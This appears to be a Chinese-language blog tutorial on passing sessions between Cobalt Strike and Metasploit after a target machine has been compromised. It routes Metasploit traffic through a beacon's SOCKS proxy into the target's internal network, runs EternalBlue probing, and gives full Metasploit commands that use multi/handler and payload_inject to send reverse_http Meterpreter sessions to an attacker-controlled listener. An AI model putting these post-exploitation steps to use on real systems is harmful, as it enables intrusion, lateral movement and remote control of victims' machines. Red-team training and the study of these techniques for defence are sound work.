CobaltStrike联动Metasploit
CobaltStrike (简称CS)及 MetaSploit (简称MSF)各有所长,CS更适合作为 稳控平台,MSF更适用于与各类内网信息搜集及漏洞利用。为了取长补短,我们进行联动。
方法一
通过CS内置socks代理将本地MSF带入目标内网执行操作
思路:利用 beacon shell 在目标机器和团队服务器之间建立 socks , 而后再在本地利用通过 proxychains 之类的工具连到目标内网即可。
假设在cs上已经拿到了一台beacon。
1.CS 启动 Socks 代理
2.使用 proxychains 代理
另一台vps编辑 /etc/proxychains.conf 文件,添加 TeamServer 服务器 ip 和 socks 端口,就可以直接连到目标内网。
在目标机器上开启http.server的服务去验证是否挂代理成功。
成功代理访问到主机的页面。
3.MSF设置代理
让本地 MSF 所有模块的流量都从 CS 的 socks5 代理走
代理信息 > tunnel > 得到设置代理命令>隧道
然后在另一台的vps上开启Msf,把刚刚那个命令复制上去,然后执行永恒之蓝的探测模块进行攻击。
方法二(推荐)
1.CS 上创建一个 http 的外部监听器( Foreign HTTP )
2.在msf上开启监听。
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost (内部ip)
set lport 803
run -j
3.在cs上直接spawn for-http 直接把流量转到msf中,获得会话的权限。
注意:如果在msf中监听的端口提示被占用,那就监听新的端口,同时在cs上修改为msf监听的新端口,msf就可以成功执行监听。
Metasploit联动CobaltStrike
假设已经在msf中得到它的一个会话了。
1.在 CS 开启一个监听(Beacon HTTP)就平常的http的反向连接的会话就行。
2.MSF 上执行 payload 注入模块
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost ip #cobaltstrike监听的ip
set lport 801 #cobaltstrike监听的端口
set session 2 #这里是获得的session的id run
DisablePayloadHandler 默认为 false ,即 payload_inject 模块执行之后会在 本地生成一个新的 handler 监听器,由于设置执行的 payload 是去连接 Cobaltstrike 的监听器,所以这里我们设置为 true ,让它不再生成新的 handler 监听器。
3.注入成功,成功上线。